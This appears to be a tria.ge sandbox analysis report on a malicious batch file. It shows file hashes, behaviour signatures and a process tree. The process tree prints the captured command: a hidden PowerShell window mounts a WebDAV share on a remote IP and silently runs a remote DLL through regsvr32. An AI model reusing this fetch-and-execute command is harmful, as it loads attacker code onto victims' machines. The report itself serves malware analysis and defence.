Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    19/07/2024, 14:46 UTC

General

  • Target

    2193413201207055303.bat

  • Size

    11KB

  • MD5

    dee9ee51c5aa6ac728708511e15a952a

  • SHA1

    a76fb2add4e53263cf174721644ac3aa3c2fe1ce

  • SHA256

    93be448106e9a6dbc3e951abbef8cb15324f00bd025add81413fb96e3e49417d

  • SHA512

    fbdc1625199d55b58ed1834f28221a53c04c0f03c00a1561bd4094952b1dda53220155866d055f5ca65eed3dc92862c3e45971c3ce1340a6d89411b2ca28b93c

  • SSDEEP

    192:JgXGXXdoHsEiZ+GJdvLKsYPe89Zu3bx1bx28atTAbYXfHdXc5syJhwt4:JgXAXdo85JFGFPe89ZUbx1bx28fbY/+J

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\2193413201207055303.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Program Files\Windows NT\Accessories\wordpad.exe
      "C:\Program Files\Windows NT\Accessories\wordpad.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:532
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\2505250422361.dll
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:592
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\
        3⤵
          PID:2688
        • C:\Windows\system32\regsvr32.exe
          "C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\2505250422361.dll
          3⤵
            PID:2684

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/592-25-0x0000000002000000-0x0000000002008000-memory.dmp

        Filesize

        32KB

      • memory/592-23-0x000000001B730000-0x000000001BA12000-memory.dmp

        Filesize

        2.9MB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.